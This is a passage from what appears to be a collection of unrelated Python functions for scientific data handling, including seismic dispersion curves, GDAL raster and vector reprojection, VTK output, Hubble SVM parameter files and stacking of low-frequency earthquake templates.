= '+str(stlo)+', out of the range of tomograpic maps!'\n continue\n disp_v = np.array([])\n disp_un = np.array([])\n T = np.array([])\n #-----------------------------\n # determine the indices\n #-----------------------------\n ind_lon = np.where(stlo<=self.lons)[0][0]\n find_lon = ind_lon \n ind_lat = np.where(stla<=self.lats)[0][0]\n find_lat = ind_lat\n # point 1\n distmin, az, baz = obspy.geodetics.gps2dist_azimuth(stla, stlo, self.lats[ind_lat], self.lons[ind_lon]) # distance is in m\n # point 2\n dist, az, baz = obspy.geodetics.gps2dist_azimuth(stla, stlo, self.lats[ind_lat], self.lons[ind_lon-1]) # distance is in m\n if dist < distmin:\n find_lon = ind_lon-1\n distmin = dist\n # point 3\n dist, az, baz = obspy.geodetics.gps2dist_azimuth(stla, stlo, self.lats[ind_lat-1], self.lons[ind_lon]) # distance is in m\n if dist < distmin:\n find_lat = ind_lat-1\n distmin = dist\n # point 4\n dist, az, baz = obspy.geodetics.gps2dist_azimuth(stla, stlo, self.lats[ind_lat-1], self.lons[ind_lon-1]) # distance is in m\n if dist < distmin:\n find_lat = ind_lat-1\n find_lon = ind_lon-1\n distmin = dist\n for per in 
pers:\n if per < Tmin or per > Tmax:\n continue\n try:\n pergrp = grp['%g_sec'%( per )]\n vel = pergrp['vel_iso_HD'].value\n vel_sem = pergrp['vel_sem_HD'].value\n except KeyError:\n if verbose:\n print 'No data for T = '+str(per)+' sec'\n continue\n T = np.append(T, per)\n disp_v = np.append(disp_v, vel[find_lat, find_lon])\n disp_un = np.append(disp_un, vel_sem[find_lat, find_lon])\n data = np.zeros((3, T.size))\n data[0, :] = T[:]\n data[1, :] = disp_v[:]\n data[2, :] = disp_un[:]\n disp_header = {'Np': T.size}\n self.add_auxiliary_data(data=data, data_type='RayDISPcurve', path=wtype+'/'+dtype+'/'+staid_aux, parameters=disp_header)\n indset.close()\n return", "def make_svm_input_file(input_filename, output_custom_pars_file='custom_svm_params.json', clobber=False,\n log_level=logutil.logging.INFO):\n log.setLevel(log_level)\n if not clobber:\n if os.path.exists(output_custom_pars_file):\n msg = \"A file named '{}' already exists. Please choose a unique name for the custom SVM parameter file.\".format(output_custom_pars_file)\n log.critical(msg)\n sys.exit()\n # Define trailer file (log file) that will contain the log entries for all processing\n if isinstance(input_filename, str): # input file is a poller file -- easy case\n logname = input_filename.replace('.out', '_svm_partam_gen.log')\n\n else:\n logname = 'svm_param_gen.log'\n\n # Initialize total trailer filename as temp logname\n logging.basicConfig(filename=logname, format=SPLUNK_MSG_FORMAT, datefmt=MSG_DATEFMT)\n # start processing\n starting_dt = datetime.datetime.now()\n log.info(\"Run start time: {}\".format(str(starting_dt)))\n\n try:\n # Parse the poller file and generate the the obs_info_dict, as well as the total detection\n # product lists which contain the ExposureProduct, FilterProduct, and TotalProduct objects\n # A poller file contains visit data for a single instrument. The TotalProduct discriminant\n # is the detector. 
A TotalProduct object is comprised of FilterProducts and ExposureProducts\n # where its FilterProduct is distinguished by the filter in use, and the ExposureProduct\n # is the atomic exposure data.\n log.info(\"Parse the poller and determine what exposures need to be combined into separate products.\\n\")\n obs_info_dict, total_obj_list = poller_utils.interpret_obset_input(input_filename, log_level)\n\n # Update all of the product objects with their associated configuration information.\n for total_item in total_obj_list:\n log.info(\"Preparing configuration parameter values for total product {}\".format(total_item.drizzle_filename))\n total_item.configobj_pars = config_utils.HapConfig(total_item,\n log_level=log_level,\n output_custom_pars_file=output_custom_pars_file)\n for filter_item in total_item.fdp_list:\n log.info(\"Preparing configuration parameter values for filter product {}\".format(filter_item.drizzle_filename))\n filter_item.configobj_pars = config_utils.HapConfig(filter_item,\n log_level=log_level,\n output_custom_pars_file=output_custom_pars_file)\n update_ci_values(filter_item, output_custom_pars_file, log_level)\n\n for expo_item in total_item.edp_list:\n log.info(\"Preparing configuration parameter values for exposure product {}\".format(expo_item.drizzle_filename))\n expo_item.configobj_pars = config_utils.HapConfig(expo_item,\n log_level=log_level,\n output_custom_pars_file=output_custom_pars_file)\n # Housekeeping: remove those pesky renamed copies of the input flc.fits/flt.fits files\n # generated by drizzlepac.haputils.product()\n if expo_item.drizzle_filename.endswith(\"_drc.fits\"):\n file_to_remove = expo_item.drizzle_filename.replace(\"_drc.fits\", \"_flc.fits\")\n if expo_item.drizzle_filename.endswith(\"_drz.fits\"):\n file_to_remove = expo_item.drizzle_filename.replace(\"_drz.fits\", \"_flt.fits\")\n if os.path.exists(file_to_remove):\n os.remove(file_to_remove)\n except Exception:\n exc_type, exc_value, exc_tb = sys.exc_info()\n traceback.print_exception(exc_type, exc_value, exc_tb, file=sys.stdout)\n err_msg = \"Something went wrong!\"\n log.error(err_msg)\n raise Exception(err_msg)", "def from_srf_file(self, filename, normalize=False):\n with open(filename, \"rt\") as f:\n # go to POINTS block\n line = f.readline()\n while 'POINTS' not in line:\n line = f.readline()\n\n npoints = int(line.split()[1])\n sources = []\n\n for _ in np.arange(npoints):\n lon, lat, dep, stk, dip, area, tinit, dt = \\\n map(float, f.readline().split())\n rake, slip1, nt1, slip2, nt2, slip3, nt3 = \\\n map(float, f.readline().split())\n\n dep *= 1e3 # km > m\n area *= 1e-4 # cm^2 > m^2\n slip1 *= 1e-2 # cm > m\n slip2 *= 1e-2 # cm > m\n # slip3 *= 1e-2 # cm > m\n\n nt1, nt2, nt3 = map(int, (nt1, nt2, nt3))\n\n if nt1 > 0:\n line = f.readline()\n while len(line.split()) < nt1:\n line = line + f.readline()\n stf = np.array(line.split(), dtype=float)\n if normalize:\n stf /= np.trapz(stf, dx=dt)\n\n M0 = area * DEFAULT_MU * slip1\n\n sources.append(\n Source.from_strike_dip_rake(\n lat, lon, dep, stk, dip, rake, M0,\n time_shift=tinit, sliprate=stf, dt=dt))\n\n if nt2 > 0:\n line = f.readline()\n while len(line.split()) < nt2:\n line = line + f.readline()\n stf = np.array(line.split(), dtype=float)\n if normalize:\n stf /= np.trapz(stf, dx=dt)\n\n M0 = area * DEFAULT_MU * slip2\n\n sources.append(\n Source.from_strike_dip_rake(\n lat, lon, dep, stk, dip, rake, M0,\n time_shift=tinit, sliprate=stf, dt=dt))\n\n if nt3 > 0:\n raise NotImplementedError('Slip along u3 axis')\n\n return 
self(pointsources=sources)", "def vaex_vertices_from_plyfile(filename):\n xyz = vertex_dict_from_plyfile(filename)\n return vx.from_dict(xyz)", "def convert_rows_to_wv(direct_file, grism_file, rows):\n\n # Collect data from FITS headers\n with fits.open(grism_file) as hdu:\n hdr = hdu[0].header\n hdr1 = hdu[1].header\n sci_postarg_1 = hdr['POSTARG1']\n sci_postarg_2 = hdr['POSTARG2']\n sci_crpix_1 = hdr1['CRPIX1'] # this isn't a real keyword...\n sci_crpix_2 = hdr1['CRPIX2'] \n\n with fits.open(direct_file) as hdu:\n hdr = hdu[0].header\n hdr1 = hdu[1].header\n data = hdu[1].data\n cal_postarg_1 = hdr['POSTARG1']\n cal_postarg_2 = hdr['POSTARG2']\n cal_crpix_1 = hdr1['CRPIX1']\n cal_crpix_2 = hdr1['CRPIX2']\n\n\n # Find the central source\n mean, med, std = sigma_clipped_stats(data, sigma=3.0, iters=5)\n sources = daofind(data-med, fwhm=3.0, threshold=5.*std)\n \n source = sources[np.where(sources['flux'] == np.max(sources['flux']))]\n x_cen, y_cen = source['xcentroid'], source['ycentroid']\n\n\n # Calculate the offset\n x_offset = sci_crpix_1 - cal_crpix_1 + (sci_postarg_1 - cal_postarg_1)/0.135\n y_offset = sci_crpix_2 - cal_crpix_2 + (sci_postarg_2 - cal_postarg_2)/0.121\n\n pos_x, pos_y = x_cen + x_offset, y_cen + y_offset\n\n constants_0 = [8.95E3, 9.35925E-2, 0.0, 0.0, 0.0, 0.0]\n constants_1 = [4.51423E1, 3.17239E-4, 2.17055E-3, -7.42504E-7, 3.4863E-7, 3.09213E-7]\n\n coords_0 = constants_0[0] + constants_0[1]*pos_x + constants_0[2]*pos_y\n coords_1 = constants_1[0] + constants_1[1]*pos_x + constants_1[2]*pos_y + constants_1[3]*pos_x**2 + constants_1[4]*pos_x*pos_y + constants_1[5]*pos_y**2\n \n wv = coords_0 + coords_1*(rows-pos_x) + pos_y\n\n return wv", "def cloud_optimize_inPlace(in_file:str,compress=\"LZW\") -> None:\n\t## add overviews to file\n\tcloudOpArgs = [\"gdaladdo\",in_file]\n\tsubprocess.call(cloudOpArgs)\n\n\t## copy file\n\tintermediate_file = in_file.replace(\".tif\",\".TEMP.tif\")\n\twith open(intermediate_file,'wb') as a:\n\t\twith open(in_file,'rb') as b:\n\t\t\tshutil.copyfileobj(b,a)\n\n\t## add tiling to file\n\tcloudOpArgs = [\"gdal_translate\",intermediate_file,in_file,'-q','-co', \"TILED=YES\",'-co',\"COPY_SRC_OVERVIEWS=YES\",'-co', f\"COMPRESS={compress}\"]#, \"-co\", \"PREDICTOR=2\"]\n\tsubprocess.call(cloudOpArgs)\n\n\t## remove intermediate\n\tos.remove(intermediate_file)", "def vtkReformat(inPath, outPath):\n # Get size of map\n inFile = open(inPath,\"rb\")\n lineList = inFile.readlines()\n for line in lineList:\n if line.lower().strip().startswith(\"dimensions\"):\n size = map(int,line.split(\" \")[1:dimension+1])\n break\n inFile.close()\n\n if dimension == 2: size += [0]\n\n outFile = open(outPath,\"wb\")\n for (i,line) in enumerate(lineList):\n if i == 1:\n newline = line.lstrip(line.rstrip(\"\\n\"))\n line = \"lddmm 8 0 0 {0} {0} 0 0 {1} {1} 0 0 {2} {2}\".format(size[2]-1, size[1]-1, size[0]-1) + newline\n outFile.write(line)", "def __init__(self, inputfile, mode=GA_ReadOnly):\n # Open the input file and read some metadata\n open(inputfile, 'r').close() # HACK: GDAL gives a useless exception\n if not isinstance(inputfile, bytes):\n inputfile = inputfile.encode('utf-8')\n try:\n # Since this is a SWIG object, clone the ``this`` pointer\n self.this = gdal.Open(inputfile, mode).this\n except RuntimeError as e:\n raise GdalError(str(e))\n\n # Shadow for metadata so we can overwrite it without saving\n # it to the original file.\n self._geotransform = None\n self._rastersizes = None", "def read_velocities(filename, return_grid=True, 
return_proj=False):\n ds = gdal.Open(filename)\n #Get dimensions\n nc = ds.RasterXSize\n nr = ds.RasterYSize\n \n geotransform = ds.GetGeoTransform()\n xOrigin = geotransform[0]\n xPix = geotransform[1] #pixel width in x-direction\n yOrigin = geotransform[3]\n yPix = geotransform[5] #pixel height in y-direction\n \n lons = xOrigin + np.arange(0, nc)*xPix\n lats = yOrigin + np.arange(0, nr)*yPix\n \n x, y = np.meshgrid(lons, lats)\n \n vband = ds.GetRasterBand(1)\n varr = vband.ReadAsArray()\n \n if return_grid and return_proj:\n return x, y, varr, ds.GetProjection()\n elif return_grid:\n return x, y, varr\n else: \n return varr", "def reproject_vector( path, epsg_from=None, epsg_to=None):\n\n if not epsg_to: raise Exception(\"please, specify the output EPSG codes\")\n\n inDataSet = None\n outDataSet = None\n inFeature = None\n outFeature = None\n outLayer = None\n\n try:\n\n driver = ogr.GetDriverByName('ESRI Shapefile')\n inDataSet = driver.Open(path, 0) # 0 means read-only\n\n # define input SpatialReference\n if not epsg_from:\n layer = inDataSet.GetLayer()\n inSpatialRef = layer.GetSpatialRef()\n else:\n inSpatialRef = osr.SpatialReference()\n inSpatialRef.ImportFromEPSG(epsg_from)\n\n # define output SpatialReference\n outSpatialRef = osr.SpatialReference()\n outSpatialRef.ImportFromEPSG(epsg_to)\n\n # create the CoordinateTransformation\n coordTrans = osr.CoordinateTransformation(inSpatialRef, outSpatialRef)\n\n # get the first input layer and the geometry type\n inLayer = inDataSet.GetLayer()\n geotype = inLayer.GetGeomType()\n lname = inLayer.GetName()\n\n drv = ogr.GetDriverByName(\"ESRI Shapefile\")\n outDataSet = drv.CreateDataSource(\"/vsimem/memory.shp\")\n\n outLayer = outDataSet.CreateLayer(lname, srs=outSpatialRef, geom_type=geotype)\n\n # add fields\n inLayerDefn = inLayer.GetLayerDefn()\n\n for i in range(0, inLayerDefn.GetFieldCount()):\n fieldDefn = inLayerDefn.GetFieldDefn(i)\n outLayer.CreateField(fieldDefn)\n\n # get the output layer\"s feature definition\n outLayerDefn = outLayer.GetLayerDefn()\n\n counter = 1\n\n # loop through the input features\n inFeature = inLayer.GetNextFeature()\n while inFeature:\n # get the input geometry\n geom = inFeature.GetGeometryRef()\n # reproject the geometry\n geom.Transform(coordTrans)\n # create a new feature\n outFeature = ogr.Feature(outLayerDefn)\n # set the geometry and attribute\n outFeature.SetGeometry(geom)\n for i in range(0, outLayerDefn.GetFieldCount()):\n outFeature.SetField(outLayerDefn.GetFieldDefn(i).GetNameRef(), inFeature.GetField(i))\n # add the feature to the shapefile\n outLayer.CreateFeature(outFeature)\n\n # destroy the features and get the next input feature\n if outFeature: outFeature = None\n inFeature = inLayer.GetNextFeature()\n\n counter += 1\n #print(counter)\n\n return outDataSet\n\n except RuntimeError as err:\n raise err\n except Exception as e:\n raise e\n\n finally:\n if inDataSet: outDataSet == None # give back control to C++\n if outDataSet: outDataSet == None\n if outLayer: outLayer == None\n if inFeature: inFeature == None\n if outFeature: outFeature = None", "def saveVelocityAndPressureVTK_binary(pressure,u,v,w,x,y,z,filename,dims):\n numEl_size = u.size; numEl = np.prod(numEl_size);\n # open the file and write the ASCII header:\n file = open(filename,'w')\n file.write('# vtk DataFile Version 3.0\\n')\n file.write('VTK file for data post-processed with Python\\n')\n file.write('Binary\\n\\n')\n file.write('DATASET STRUCTURED_GRID\\n')\n file.write('DIMENSIONS %d %d %d 
\\n'%(dims[0],dims[1],dims[2]))\n file.write('POINTS %d float\\n'%(numEl))\n file.close()\n \n # append binary x,y,z data\n file = open(filename,'ab')\n for i in range(len(x)): # there really needs to be a better way.\n pt = [x[i],y[i],z[i]]\n pt_buf = array('f',pt)\n pt_buf.byteswap()\n file.write(pt_buf)\n \n \n file.close()\n \n # append an ASCII sub header\n file = open(filename,'a')\n file.write('POINT_DATA %d \\n'%numEl)\n file.write('VECTORS velocity_vectors float\\n')\n file.close()\n \n # append binary u,v,w data\n file = open(filename,'ab')\n for i in range(len(u)):\n pt = [u[i],v[i],w[i]]\n pt_buf = array('f',pt)\n pt_buf.byteswap()\n file.write(pt_buf)\n \n file.close()\n \n # append ASCII sub header for scalar velocity magnitude data\n file = open(filename,'a')\n file.write('SCALARS VelocityMagnitude float\\n')\n file.write('LOOKUP_TABLE default\\n')\n \n file.close()\n \n file = open(filename,'ab')\n v_mag = np.sqrt(u**2+v**2+w**2)\n file = open(filename,'ab')\n p_buf = array('f',v_mag); p_buf.byteswap()\n file.write(p_buf)\n file.close()\n \n \n # append another ASCII sub header for the scalar pressure data\n file = open(filename,'a')\n file.write('SCALARS Pressure float\\n')\n file.write('LOOKUP_TABLE default\\n')\n file.close()\n \n # append binary pressure data\n file = open(filename,'ab')\n p_buf = array('f',pressure); p_buf.byteswap()\n file.write(p_buf)\n file.close()", "def cli(source_f, raster_f, output, verbose):\n with fiona.open(source_f, 'r') as source:\n source_driver = source.driver\n source_crs = source.crs\n sink_schema = source.schema.copy()\n\n source_geom = source.schema['geometry']\n if source_geom == 'Point':\n sink_schema['geometry'] = '3D Point'\n elif source_geom == 'LineString':\n sink_schema['geometry'] = '3D LineString'\n elif source_geom == '3D Point' or source_geom == '3D LineString':\n pass\n else:\n click.BadParameter(\"Source geometry type {} not implemented\".format(source_geom))\n\n with rasterio.open(raster_f) as raster:\n if source_crs != raster.crs:\n click.BadParameter(\"Features and raster have different CRS.\")\n if raster.count > 1:\n warnings.warn(\"Found {0} bands in {1}, expected a single band raster\".format(raster.bands, raster_f))\n supported = ['int16', 'int32', 'float32', 'float64']\n if raster.dtypes[0] not in supported:\n warnings.warn(\"Found {0} type in {1}, expected one of {2}\".format(raster.dtypes[0], raster_f, supported))\n with fiona.open(\n output, 'w',\n driver=source_driver,\n crs=source_crs,\n schema=sink_schema) as sink:\n\n for feature in source:\n try:\n feature_z = drapery.drape(raster, feature)\n sink.write({\n 'geometry': mapping(feature_z),\n 'properties': feature['properties'],\n })\n except Exception:\n logging.exception(\"Error processing feature %s:\", feature['id'])\n #print(sink.closed)\n #print(raster.closed)\n #print(source.closed)", "def run(self, verbose=False):\n from utils import write_to_file # function to write json to file\n self.read_json()\n graph = self.parse_jsons()\n json = self.pipe_vl2vg(graph)\n return self.write_to_file(rawinput=json, filetype='json', output_path=self.output_path, engine_name=self.engine_name, algorithm_name=self.algorithm_name, suffix=self.file_suffix, verbose=verbose)", "def compute_templates(filename, TDUR, filt, ratios, dt, ncor, window, \\\n winlength, nattempts, waittime, method='RMS'):\n # To transform latitude and longitude into kilometers\n a = 6378.136\n e = 0.006694470\n lat0 = 41.0\n lon0 = -123.0\n dx = (pi / 180.0) * a * cos(lat0 * pi / 180.0) / 
sqrt(1.0 - e * e * \\\n sin(lat0 * pi / 180.0) * sin(lat0 * pi / 180.0))\n dy = (3.6 * pi / 648.0) * a * (1.0 - e * e) / ((1.0 - e * e * sin(lat0 * \\\n pi / 180.0) * sin(lat0 * pi / 180.0)) ** 1.5)\n\n # Get the names of the stations which have a waveform for this LFE family\n file = open('../data/Plourde_2015/detections/' + filename + \\\n '_detect5_cull.txt')\n first_line = file.readline().strip()\n staNames = first_line.split()\n file.close()\n\n # Get the time of LFE detections\n LFEtime = np.loadtxt('../data/Plourde_2015/detections/' + filename + \\\n '_detect5_cull.txt', \\\n dtype={'names': ('unknown', 'day', 'hour', 'second', 'threshold'), \\\n 'formats': (np.float, '|S6', np.int, np.float, np.float)}, \\\n skiprows=2)\n\n # Get the network, channels, and location of the stations\n staloc = pd.read_csv('../data/Plourde_2015/station_locations.txt', \\\n sep=r'\\s{1,}', header=None)\n staloc.columns = ['station', 'network', 'channels', 'location', \\\n 'server', 'latitude', 'longitude']\n\n # Get the location of the source of the LFE\n LFEloc = np.loadtxt('../data/Plourde_2015/templates_list.txt', \\\n dtype={'names': ('name', 'family', 'lat', 'lon', 'depth', 'eH', \\\n 'eZ', 'nb'), \\\n 'formats': ('S13', 'S3', np.float, np.float, np.float, \\\n np.float, np.float, np.int)}, \\\n skiprows=1)\n for ie in range(0, len(LFEloc)):\n if (filename == LFEloc[ie][0].decode('utf-8')):\n lats = LFEloc[ie][2]\n lons = LFEloc[ie][3]\n xs = dx * (lons - lon0)\n ys = dy * (lats - lat0)\n\n # Create directory to store the waveforms\n namedir = 'templates/' + filename\n if not os.path.exists(namedir):\n os.makedirs(namedir)\n\n # Read origin time and station slowness files\n origintime = pickle.load(open('timearrival/origintime.pkl', 'rb'))\n slowness = pickle.load(open('timearrival/slowness.pkl', 'rb'))\n\n # File to write error messages\n errorfile = 'error/' + filename + '.txt'\n\n # Loop over stations\n for station in staNames:\n # Create streams\n EW = Stream()\n NS = Stream()\n UD = Stream()\n # Get station metadata for downloading\n for ir in range(0, len(staloc)):\n if (station == staloc['station'][ir]):\n network = staloc['network'][ir]\n channels = staloc['channels'][ir]\n location = staloc['location'][ir]\n server = staloc['server'][ir]\n # Compute source-receiver distance\n latitude = staloc['latitude'][ir]\n longitude = staloc['longitude'][ir]\n xr = dx * (longitude - lon0)\n yr = dy * (latitude - lat0)\n distance = sqrt((xr - xs) ** 2.0 + (yr - ys) ** 2.0)\n # Loop on LFEs\n for i in range(0, np.shape(LFEtime)[0]):\n YMD = LFEtime[i][1]\n myYear = 2000 + int(YMD[0 : 2])\n myMonth = int(YMD[2 : 4])\n myDay = int(YMD[4 : 6])\n myHour = LFEtime[i][2] - 1\n myMinute = int(LFEtime[i][3] / 60.0)\n mySecond = int(LFEtime[i][3] - 60.0 * myMinute)\n myMicrosecond = int(1000000.0 * \\\n (LFEtime[i][3] - 60.0 * myMinute - mySecond))\n Tori = UTCDateTime(year=myYear, month=myMonth, day=myDay, \\\n hour=myHour, minute=myMinute, second=mySecond, \\\n microsecond=myMicrosecond)\n Tstart = Tori - TDUR\n Tend = Tori + 60.0 + TDUR\n # First case: we can get the data from IRIS\n if (server == 'IRIS'):\n (D, orientation) = get_from_IRIS(station, network, channels, \\\n location, Tstart, Tend, filt, dt, nattempts, waittime, \\\n errorfile)\n # Second case: we get the data from NCEDC\n elif (server == 'NCEDC'):\n (D, orientation) = get_from_NCEDC(station, network, channels, \\\n location, Tstart, Tend, filt, dt, nattempts, waittime, \\\n errorfile)\n else:\n raise ValueError( \\\n 'You can only download 
data from IRIS and NCEDC')\n if (type(D) == obspy.core.stream.Stream):\n # Add to stream\n if (channels == 'EH1,EH2,EHZ'):\n EW.append(D.select(channel='EH1').slice(Tori, \\\n Tori + 60.0)[0])\n NS.append(D.select(channel='EH2').slice(Tori, \\\n Tori + 60.0)[0])\n UD.append(D.select(channel='EHZ').slice(Tori, \\\n Tori + 60.0)[0])\n else:\n EW.append(D.select(component='E').slice(Tori, \\\n Tori + 60.0)[0])\n NS.append(D.select(component='N').slice(Tori, \\\n Tori + 60.0)[0])\n UD.append(D.select(component='Z').slice(Tori, \\\n Tori + 60.0)[0])\n else:\n print('Failed at downloading data')\n # Stack\n if (len(EW) > 0 and len(NS) > 0 and len(UD) > 0):\n # Stack waveforms\n EWstack = linstack([EW], normalize=True, method=method) \n NSstack = linstack([NS], normalize=True, method=method)\n UDstack = linstack([UD], normalize=True, method=method)\n # Initializations\n maxCC = np.zeros(len(EW))\n cc0EW = np.zeros(len(EW))\n cc0NS = np.zeros(len(EW))\n cc0UD = np.zeros(len(EW))\n if (window == True):\n # Get time arrival\n arrivaltime = origintime[filename] + \\\n slowness[station] * distance\n Tmin = arrivaltime - winlength / 2.0\n Tmax = arrivaltime + winlength / 2.0\n if Tmin < 0.0:\n Tmin = 0.0\n if Tmax > EWstack[0].stats.delta * (EWstack[0].stats.npts - 1):\n Tmax = EWstack[0].stats.delta * (EWstack[0].stats.npts - 1)\n ibegin = int(Tmin / EWstack[0].stats.delta)\n iend = int(Tmax / EWstack[0].stats.delta) + 1\n # Cross correlation\n for i in range(0, len(EW)):\n ccEW = correlate(EWstack[0].data[ibegin : iend], \\\n EW[i].data[ibegin : iend], ncor)\n ccNS = correlate(NSstack[0].data[ibegin : iend], \\\n NS[i].data[ibegin : iend], ncor)\n ccUD = correlate(UDstack[0].data[ibegin : iend], \\\n UD[i].data[ibegin : iend], ncor)\n maxCC[i] = np.max(ccEW) + np.max(ccNS) + np.max(ccUD)\n cc0EW[i] = ccEW[ncor]\n cc0NS[i] = ccNS[ncor]\n cc0UD[i] = ccUD[ncor]\n else:\n # Cross correlation\n for i in range(0, len(EW)):\n ccEW = correlate(EWstack[0].data, EW[i].data, ncor)\n ccNS = correlate(NSstack[0].data, NS[i].data, ncor)\n ccUD = correlate(UDstack[0].data, UD[i].data, ncor)\n maxCC[i] = np.max(ccEW) + np.max(ccNS) + np.max(ccUD)\n cc0EW[i] = ccEW[ncor]\n cc0NS[i] = ccNS[ncor]\n cc0UD[i] = ccUD[ncor]\n # Sort cross correlations\n index = np.flip(np.argsort(maxCC), axis=0)\n EWbest = Stream()\n NSbest = Stream()\n UDbest = Stream()\n # Compute stack of best LFEs\n for j in range(0, len(ratios)):\n nLFE = int(ratios[j] * len(EW) / 100.0)\n EWselect = Stream()\n NSselect = Stream()\n UDselect = Stream()\n for i in range(0, nLFE):\n EWselect.append(EW[index[i]])\n NSselect.append(NS[index[i]])\n UDselect.append(UD[index[i]])\n # Stack best LFEs\n EWbest.append(linstack([EWselect], normalize=True, \\\n method=method)[0])\n NSbest.append(linstack([NSselect], normalize=True, \\\n method=method)[0])\n UDbest.append(linstack([UDselect], normalize=True, \\\n method=method)[0])\n # Plot figure\n plt.figure(1, figsize=(20, 15))\n params = {'xtick.labelsize':16,\n 'ytick.labelsize':16}\n pylab.rcParams.update(params) \n colors = cm.rainbow(np.linspace(0, 1, len(ratios)))\n # East - West component\n ax1 = plt.subplot(311)\n dt = EWstack[0].stats.delta\n nt = EWstack[0].stats.npts\n t = dt * np.arange(0, nt)\n for j in range(0, len(ratios)):\n if (method == 'RMS'):\n norm = EWbest[j].data / np.sqrt(np.mean(np.square( \\\n EWbest[j].data)))\n elif (method == 'MAD'):\n norm = EWbest[j].data / np.median(np.abs(EWbest[j].data - \\\n np.median(EWbest[j].data)))\n else:\n raise ValueError('Method must be RMS or MAD')\n 
norm = np.nan_to_num(norm)\n plt.plot(t, norm, color = colors[j], \\\n label = str(int(ratios[j])) + '%')\n if (method == 'RMS'):\n norm = EWstack[0].data / np.sqrt(np.mean(np.square( \\\n EWstack[0].data)))\n elif (method == 'MAD'):\n norm = EWstack[0].data / np.median(np.abs(EWstack[0].data - \\\n np.median(EWstack[0].data)))\n else:\n raise ValueError('Method must be RMS or MAD')\n norm = np.nan_to_num(norm)\n plt.plot(t, norm, 'k', label='All')\n if (window == True):\n plt.axvline(Tmin, linewidth=2, color='grey')\n plt.axvline(Tmax, linewidth=2, color='grey')\n plt.xlim([np.min(t), np.max(t)])\n plt.title('East - West component', fontsize=24)\n plt.xlabel('Time (s)', fontsize=24)\n plt.legend(loc=1)\n # North - South component\n ax2 = plt.subplot(312)\n dt = NSstack[0].stats.delta\n nt = NSstack[0].stats.npts\n t = dt * np.arange(0, nt)\n for j in range(0, len(ratios)):\n if (method == 'RMS'):\n norm = NSbest[j].data / np.sqrt(np.mean(np.square( \\\n NSbest[j].data)))\n elif (method == 'MAD'):\n norm = NSbest[j].data / np.median(np.abs(NSbest[j].data - \\\n np.median(NSbest[j].data)))\n else:\n raise ValueError('Method must be RMS or MAD')\n norm = np.nan_to_num(norm)\n plt.plot(t, norm, color = colors[j], \\\n label = str(int(ratios[j])) + '%')\n if (method == 'RMS'):\n norm = NSstack[0].data / np.sqrt(np.mean(np.square( \\\n NSstack[0].data)))\n elif (method == 'MAD'):\n norm = NSstack[0].data / np.median(np.abs(NSstack[0].data - \\\n np.median(NSstack[0].data)))\n else:\n raise ValueError('Method must be RMS or MAD')\n norm = np.nan_to_num(norm)\n plt.plot(t, norm, 'k', label='All')\n if (window == True):\n plt.axvline(Tmin, linewidth=2, color='grey')\n plt.axvline(Tmax, linewidth=2, color='grey')\n plt.xlim([np.min(t), np.max(t)])\n plt.title('North - South component', fontsize=24)\n plt.xlabel('Time (s)', fontsize=24)\n plt.legend(loc=1)\n # Vertical component\n ax3 = plt.subplot(313)\n dt = UDstack[0].stats.delta\n nt = UDstack[0].stats.npts\n t = dt * np.arange(0, nt)\n for j in range(0, len(ratios)):\n if (method == 'RMS'):\n norm = UDbest[j].data / np.sqrt(np.mean(np.square( \\\n UDbest[j].data)))\n elif (method == 'MAD'):\n norm = UDbest[j].data / np.median(np.abs(UDbest[j].data - \\\n np.median(UDbest[j].data)))\n else:\n raise ValueError('Method must be RMS or MAD')\n norm = np.nan_to_num(norm)\n plt.plot(t, norm, color = colors[j], \\\n label = str(int(ratios[j])) + '%')\n if (method == 'RMS'):\n norm = UDstack[0].data / np.sqrt(np.mean(np.square( \\\n UDstack[0].data)))\n elif (method == 'MAD'):\n norm = UDstack[0].data / np.median(np.abs(UDstack[0].data - \\\n np.median(UDstack[0].data)))\n else:\n raise ValueError('Method must be RMS or MAD')\n norm = np.nan_to_num(norm)\n plt.plot(t, norm, 'k', label='All')\n if (window == True):\n plt.axvline(Tmin, linewidth=2, color='grey')\n plt.axvline(Tmax, linewidth=2, color='grey')\n plt.xlim([np.min(t), np.max(t)])\n plt.title('Vertical component', fontsize=24)\n plt.xlabel('Time (s)', fontsize=24)\n plt.legend(loc=1)\n # End figure\n plt.suptitle(station, fontsize=24)\n plt.savefig(namedir + '/' + station + '.eps', format='eps')\n ax1.clear()\n ax2.clear()\n ax3.clear()\n plt.close(1)\n # Save stacks into files\n savename = namedir + '/' + station +'.pkl'\n pickle.dump([EWstack[0], NSstack[0], UDstack[0]], \\\n open(savename, 'wb'))\n for j in range(0, len(ratios)):\n savename = namedir + '/' + station + '_' + \\\n str(int(ratios[j])) + '.pkl'\n pickle.dump([EWbest[j], NSbest[j], UDbest[j]], \\\n open(savename, 'wb'))\n # Save 
cross correlations into files\n savename = namedir + '/' + station + '_cc.pkl'\n pickle.dump([cc0EW, cc0NS, cc0UD], \\\n open(savename, 'wb'))", "def create_dat_from_shapefile(windgrid_file, DAT_header, output_file, wind_field='Vg_mph'):\n t0 = time()\n output_file = output_file + '.dat'\n print('reading windgrid')\n t1 = time()\n gdf = gpd.read_file(windgrid_file)\n create_dat_from_geodataframe(\n gdf, DAT_header, output_file, wind_field=wind_field)", "def load_viewpoint(viewpoint_file):\n with open(viewpoint_file) as viewpoints:\n for line in viewpoints.readlines():\n yield VP(*line.strip().split())", "def _get_std_vmr_file(std_vmr_file):\n if std_vmr_file is None:\n gggpath = os.getenv('GGGPATH')\n if gggpath is None:\n raise GGGPathError('GGGPATH environmental variable is not defined. Either define it, explicitly pass a '\n 'path to a .vmr file with northern midlat profiles for all gases, or pass False to '\n 'only write the primary gases to the .vmr file')\n std_vmr_file = os.path.join(gggpath, 'vmrs', 'gnd', 'summer_35N.vmr')\n if not os.path.isfile(std_vmr_file):\n raise GGGPathError('The standard .vmr file is not present in the expected location ({}). Your GGGPATH '\n 'environmental variable may be incorrect, or the structure of the GGG directory has '\n 'changed. Either correct your GGGPATH value, explicitly pass a path to a .vmr file with '\n 'northern midlat profiles for all gases, or pass False to only write the primary gases '\n 'to the .vmr file'.format(std_vmr_file))\n return std_vmr_file\n else:\n return std_vmr_file", "def _create_farm_result_vector(\n base_vector_path, target_vector_path):\n base_vector = gdal.OpenEx(base_vector_path, gdal.OF_VECTOR)\n\n driver = gdal.GetDriverByName('ESRI Shapefile')\n target_vector = driver.CreateCopy(\n target_vector_path, base_vector)\n target_layer = target_vector.GetLayer()\n\n farm_pollinator_abundance_defn = ogr.FieldDefn(\n _POLLINATOR_ABUNDANCE_FARM_FIELD_ID, ogr.OFTReal)\n farm_pollinator_abundance_defn.SetWidth(25)\n 